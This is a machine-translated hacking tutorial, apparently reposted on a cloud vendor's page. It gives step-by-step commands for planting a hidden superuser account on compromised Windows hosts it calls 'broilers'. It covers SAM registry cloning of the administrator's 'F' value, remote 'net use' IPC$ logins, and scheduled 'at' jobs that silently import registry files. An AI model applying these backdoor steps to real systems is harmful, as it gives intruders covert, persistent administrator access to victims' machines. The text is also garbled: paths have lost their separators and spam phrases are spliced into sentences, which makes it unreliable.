Multiple hidden Superuser methods in the system

Source: Internet
Author: User

How to create a hidden super user in the graphical interface

The graphical interface is suitable for local or open 3389 Terminal Services on the broiler. The author I mentioned above said that the method is very good, but more complex, but also to use Psu.exe (let the program as the system user status of the program), if the words on the broiler to upload psu.exe. I said this method will not have to psu.exe this program. Because Windows2000 has two registry editors: Regedit.exe and Regedt32.exe. XP Regedit.exe and Regedt32.exe are actually a program that modifies the rights of key values by right-clicking "permissions" in the right key. I think everyone is familiar with the Regedit.exe, but you can't set permissions on the key keys to the registry, and Regedt32.exe the biggest advantage is the ability to set permissions on key keys in the registry. NT/2000/XP's account information is under the Registry's Hkey_local_machinesamsam key, but other users are not authorized to see the information except XP system users, so I first set the SAM key for me with Regedt32.exe to Full Control permission. This allows you to read and write the information in the SAM key. The concrete steps are as follows:

1. Assuming that we are logged on to a broiler with Terminal Services as Superuser Administrator, first set up an account at the command line or in the Account Manager: hacker$, here I set up this account at the command line.

NET user hacker$ 1234/add

2, in the start/Run input: Regedt32.exe and enter to run Regedt32.exe.

3, the point "permission" will pop up the window

Click Add to add the account I logged in to the security bar, Ghost XP Here I am logged in as the administrator, so I will join the administrator and set the permissions to "Full Control." Here is a note: It is better to add the account or account you are logged in to the group, do not modify the original account or group, otherwise it will bring a series of unnecessary problems. And so the hidden super user is built, and then come here to delete the account you added.

4, then click "Start" → "Run" and enter "Regedit.exe" return, start Registry Editor Regedit.exe. Open key:

hkey_local_maichinesamsamdomainsaccountusernameshacker$ "

5, the item hacker$, 00000409, 000001F4 Export as Hacker.reg, 409.reg, 1f4.reg, with Notepad dozen these exported files for editing, the super user corresponding to the key 000001f4 under the value of "F" copy, and overwrite the value of the key "F" in the corresponding item 00000409 of hacker$, then merge 00000409.reg with Hacker.reg.

6. Execute NET user hacker$/del at the command line to delete users hacker$:

NET user hacker$/del

7, in Regedit.exe window press F5 refresh, XP system download and then hit the file-import registry file will be modified Hacker.reg import registry can

8, to this, the hidden super user hacker$ has been built, and then shut down the Regedit.exe. In the Regedt32.exe window, change the Hkey_local_machinesamsam key permissions back to the original (as long as you delete the added account administrator).

9. Note: Hidden super user built, in the account manager can not see hacker$ this user, in the command line with the "NET User" command can not see, but after the establishment of superuser, you can no longer change the password, if the net user command to change the hacker$ password, The hidden Superuser will be seen again in the account manager and cannot be deleted.

How to create a hidden superuser remotely under the command line

Here you will use the AT command, because the scheduled task produced with at is run as a system house, so you cannot use the Psu.exe program. In order to be able to use the AT command, the broiler must have a schedule service, if not open, can be used in Streamer tools Netsvc.exe or Sc.exe to remotely start, of course, its method can also, as long as can start schedule service on the line.

For command-line methods, you can use a variety of connection methods, such as using SqlExec to connect MSSQL 1433 ports, or Telnet service, as long as you can get a cmdshell and have permission to run at command.

1, first to find a chicken, as to how to find that is not what I am talking about the topic. Let's assume that we've found a super User administrator with a password of 12345678, and now we're starting to remotely create a hidden superuser for it at the command line. (Example of the host is a host of my local area network, the latest XP system download I will change its IP address to 13.50.97.238, please do not on the Internet, so as to avoid harassment of normal IP address.) )

2, first to establish a connection with the broiler, the command is: net use 13.50.97.238ipc$ "12345678"/user: "Administrator

3. Use at command to establish a user on the broiler (if the at service is not started, use the Netsvc.exe or sc.exe of the Banyan tree to start remotely):

At 13.50.97.238 12:51 c:winntsystem32net.exe user hacker$ 1234/add

Create the user name with the $ character, because after the $ character is added, the user will not be displayed in the command line with net user, but the user can be seen in the account manager.

4. Also use the AT command to export hkey_local_machinesamsamdomainsaccountusers key values:

At 13.50.97.238 12:55 c:winntregedit.exe/e Hacker.reg

Hkey_local_machinesamsamdomainsaccountusers

/e is the regedit.exe parameter, in _local_machinesamsamdomainsaccountusers this key must end. If necessary, you can enclose the c:winntregedit.exe/e hacker.reg hkey_local_machinesamsamdomainsaccountusers in quotation marks.

5, the chicken on the Hacker.reg download to the computer with Notepad open for editing commands are:

Copy 13.50.97.238admin$system32hacker.reg C:hacker.reg

The modified method has been introduced in the graphic world and is not introduced here.

6. Hacker.reg the edited copy back to the broiler

Copy C:hacker.reg 13.50.97.238admin$system32hacker1.reg

7, view broiler time: NET times 13.50.97.238 then use the AT command to remove the user hacker$:

At 13.50.97.238 13:40 NET user hacker$/del

8, verify hacker$ is deleted: With

NET use 13.50.97.238/del disconnect from the broiler.

NET use 13.50.97.238ipc$ "1234"/user: "hacker$" with the account hacker$ connection with the broiler, Ghost XP SP3 cannot connect the description has been deleted.

9, and then set up a connection with the broiler: net use 13.50.97.238ipc$ "12345678"/user: "the administrator" to get the chicken time, with at the command will be copied back to the Broiler Hacker1.reg import Broiler Registry:

At 13.50.97.238 13:41 c:winntregedit.exe/s Hacker1.reg

The regedit.exe parameter/s refers to quiet mode.

10, verify hacker$ has been established, the system download method with the above verify that hacker$ is deleted.

11, and then verify the user hacker$ whether read, write, delete the permissions, if not trust, you can also verify that you can establish other accounts.

12, through 11 can be determined that the user hacker$ has Superuser privileges, XP system because originally I use at command to build it is an ordinary user, but now has remote read, write, delete permissions.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.